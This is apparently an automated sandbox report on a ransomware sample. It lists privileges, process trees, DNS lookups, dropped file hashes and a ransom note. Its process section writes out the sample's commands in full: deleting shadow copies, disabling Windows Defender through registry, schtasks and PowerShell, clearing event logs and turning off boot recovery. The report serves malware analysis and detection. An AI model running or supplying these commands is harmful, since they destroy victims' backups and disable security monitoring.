Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4768 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 2472 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2472 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4536 wrote to memory of 1660 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4536 wrote to memory of 1660 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1860 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 728 wrote to memory of 4344 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 728 wrote to memory of 4344 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 2452 wrote to memory of 4160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2452 wrote to memory of 4160 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4240 wrote to memory of 5000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4240 wrote to memory of 5000 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4696 wrote to memory of 4152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4696 wrote to memory of 4152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4768 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\net.exe
PID 4080 wrote to memory of 2208 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4080 wrote to memory of 2208 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4768 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\sc.exe
PID 4768 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_28111" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_28111" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_28111" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/2056-2-0x00000200D7230000-0x00000200D7252000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ubdxtedy.nfr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

C:\Program Files\phLK_HOW_TO_DECRYPT.txt

MD5 7c7498625660600d7277d186038c05fa
SHA1 144ea5eccf0824e9c30681f64c25224753886533
SHA256 1da21b2c48b5e60b2e6ced94b990c73a0644fc147cc13b38c022a9f1c058ad3c
SHA512 32ee4b3ba5a1c86ee47be70428204af3f30f865eba33693a235dd7c6ae51d33369b4a486ee41e837c8fbe117edf54ba0cd01b1535a369c14683ca833768d4e92